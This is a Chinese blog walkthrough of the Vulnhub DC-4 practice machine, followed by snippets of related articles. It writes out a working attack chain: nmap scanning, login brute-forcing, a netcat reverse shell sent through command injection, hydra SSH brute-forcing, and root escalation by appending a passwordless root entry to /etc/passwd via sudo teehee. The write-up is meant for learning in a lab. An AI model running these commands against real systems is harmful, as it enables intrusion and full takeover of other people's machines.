Vulnhub靶场实战———DC4

最新推荐文章于 2024-07-06 11:48:34 发布
最新推荐文章于 2024-07-06 11:48:34 发布
阅读量186 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_67309561/article/details/130464185
版权

环境下载

DC and Five86 Series Challenges - DC-4

环境配置

 

注:DC4这关跟DC3一样只有一个FLAG,我们要通过提权的方法一步一步获取

信息探测 

nmap -sP 192.168.100.0/24
nmap -sV -A -p- 192.168.100.13

发现这里开着80端口以及ssh服务22端口,我们先进入80端口看一下

获取FLAG

进入了网站我们尝试弱口令爆破,万能密码输入,结果都不行,我们用AWVS尝试扫描一下

我们发现这个网站并不存在什么高危漏洞,可知,这应该是个简单的登录框,并不是什么cms,接下来我们尝试密码爆破

 爆破出他的密码为happy,我们登录进去看一看

发现他是通过命令的方式来执行的,我们用BP抓包看一下

 果然是这样,既然如此我们就通过这种方式来反弹shell

我们先开启nc监测 

 

接下来去BP那边修改一下请求包,并且发送

nc 192.168.100.13 1234 -e /bin/bash 
#	nc+192.168.79.128+8080+-e+/bin/bash 
#	空格+号代替

成功反弹 

 我们先查看一下有什么文件

我们找到了jim文件下包含了一个密码本,我们将此密码本保存下来,去kali中爆破一下

hydra -l jim -P 1.txt -I -T 64 ssh://192.168.100.13:22

 成功爆破出jim的密码,那我们就尝试登录

ssh jim@192.168.100.13 -p 22

 成功登录,他提示我们有一封邮件需要去查看一下,那我们去看一看

cd /var/mail

 我们得到了charles的密码,那我们登录他的账号看一下

发现什么都没有,那我们 查看 使用sudo运行的命令

sudo -l

发现提权关键词teehee,我们使用此命令来操作一下

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
# 用户名admin 没有密码为管理员权限 进入的时候运行/bin/bash

成功提权

那我们去root目录下获取FLAG

 成功获取,结束! 

Digh
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
vulnhub】---DC-4靶机
qq_43168364的博客
08-21 1913
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机:DC-4靶机(192.168.15.152) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗透步骤 渗透思路 ......
Vulnhub靶机渗透测试——DC-4
Cobra的博客
05-03 1738
一、实验环境 攻击机(kail):192.168.189.148 靶机(ubuntu):192.168.189.183 二、信息收集 1、使用nmap进行主机发现 nmap 192.168.189.0/24 2、发现IP192.168.189.183,再使用nmap对其进行扫描 nmap -sV -A -T4 -p- 192.168.189.183 3、发现其开放80,22端口,访问其80端口,是一个登录框 4、在对其进行SQL注入,目录扫描无果后,果断选择暴力破解..
Vulnhub-DC-4靶机实战
御七彩虹猫
04-07 2372
Vulnhub-DC-4靶机实战
Vulnhub靶机:DC-4渗透详细过程
IerkeU的博客
02-28 1860
基本步骤 前言提要: 靶场地址:DC: 4 ~ VulnHub DC-4是一个初中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 这次练习的靶机vulnhub平台下的DC系列靶机第四台,该靶机的难度系数为简单,拿下该靶机的关键就是需要收集信息,最终目的是获取root权限,拿到flag。 步骤: 信息收集 nmap 192.168.132.0/24 目标靶机ip:192.168.132.150 全面扫描 n
记一次vulnhub|渗透测试DC-4(常规和非预期提权思路)
crispr的博客
02-02 944
Five86-2 0X01 Main Point 1.Burpsuite爆破模块进行简单爆破 2.Hydra爆破进行SSH连接 3.CVE-2019-10149–exim漏洞进行本地提权
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
vulnhub靶场实战系列-DC-1实战流程图
05-17
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
dc4靶机实战记录thee追加提权
qq_45290991的博客
08-21 157
一、外网打点 80端口和22端口 22 hydra爆破不出来,80,sql注入扫不出来。直接爆破admin 账号admin 密码happy 进去之后发现命令执行: 能列出文件 ,ls。所以, bp抓包试试改命令。 nc反弹shell 交互式: python -c 'import pty;pty.spawn("/bin/sh")' 二、后渗透 在用户jim目录下发现一个old password 文件: 生成密码,爆破ssh用户,猜测本机还有什么用户。 破解ssh.
看完这篇 教你玩转渗透测试靶机vulnhub——DC4
Aluxian_的博客
03-24 4556
Vulnhub靶机DC4渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 从靶机DC4靶机拿到shell 在提权,,,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five
DC-4渗透靶机详解
weixin_51083551的博客
09-12 4047
萌新DC系列靶机渗透详解之 DC-4 “DC-3好难呜呜,先打DC-4” 1. 明确目标 获得靶机 root 权限,找到root账户下的 flag 2. 信息收集 使用 arp-scan 扫描网段下的主机 └─# arp-scan -l
DC靶机渗透-DC4
weixin_41607190的博客
12-20 1756
设置成nat模式 发现主机 arp-scan -l #对局域网内的每个主机发送arp包,存在主机就会返回arp响应 端口扫描,看开启了哪些服务(端口对应服务)
Vulnhub-dc4学习笔记
weixin_42820274的博客
09-22 188
Vulnhub-dc4学习笔记1.NMAP扫描子网2.查看80端口web页面3.登陆后web页面利用4.使用hydra爆破ssh5.进行提权 1.NMAP扫描子网 老套路先namp,发现22和80端口。 2.查看80端口web页面 用了nginx,但是没找到可以利用的漏洞,各种尝试都不行,除了用户名admin也没有任何提示,最后觉得可能是爆破,因为不喜欢爆破加上需要很多时间,查了查大佬的攻略,直接copy密码登陆 3.登陆后web页面利用 发现可以执行命令,用burpsuit修改post数据 根目录没
【ARMv8/v9 GIC 系列 5.4 -- 中断分组与安全及优先级配置】
最新发布
CodingCos的博客
07-06 42
在这两种状态中,都可以执行用户级别和特权级别的代码,但是在非安全状态下执行的软件只能通过对安全监视器(Secure Monitor)的系统调用来访问安全状态。GIC(通用中断控制器)架构支持与这两种安全状态相关的中断的路由和处理。在多处理器系统中,系统内的一个或多个处理元素(PEs)可能支持仅在安全状态下可用的资源访问,或仅在非安全状态下可用的资源访问。这种灵活的配置允许系统根据需要调整中断处理的优先级分组,使得系统能够更有效地响应不同优先级的中断请求。标志指示GIC是否配置为支持ARMv8-A安全模型。
Akamai+Noname强强联合 | API安全再加强
AKAMAI_CHINA的博客
07-03 1028
最近,Akamai正式完成了对Noname Security的收购。本文我们将向大家介绍,经过本次收购后,Akamai在保护API安全性方面的后续计划和未来愿景。Noname Security是市场上领先的API安全供应商之一,此次收购将让Akamai能更好地满足日益增长的客户需求和市场要求。具体来说,Akamai将能借助本次收购扩展API流量方面的情报,满足客户可能提出的,与业务、集成或部署要求有关的任何问题。
安全隔离上网的有效途径:沙箱
Canon_YK的博客
07-01 544
沙箱技术,顾名思义,就像是在计算机系统中构建一个“沙箱”,将应用程序或系统进程的运行限制在这个“沙箱”内,使其无法访问或修改系统核心资源,从而达到隔离的效果。沙箱技术作为一种高效的隔离机制,为企业和个人提供了一种在享受网络便利的同时,保障系统安全的解决方案。浏览器级别沙箱是另一种常见的沙箱技术实现方式。目前也只有深信达的沙箱技术是可以运行和控制虚拟机的,将整个磁盘进行加密可以很好地进行控制,如果企业安全需求比较高可以采用全盘加密的方式,一般情况下隔离出虚拟空间的轻型沙箱就可以满足轻量化办公的需求。
[图解]SysML和EA建模住宅安全系统-08-安全企业用例图
rolt的专栏
07-03 651
因为主辅只是针对某个用例而言
vulnhub靶场 breakout
08-29
- *1* *2* *3* [【VulnHub靶场】——EMPIRE: BREAKOUT](https://blog.csdn.net/qq_63844103/article/details/127028486)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值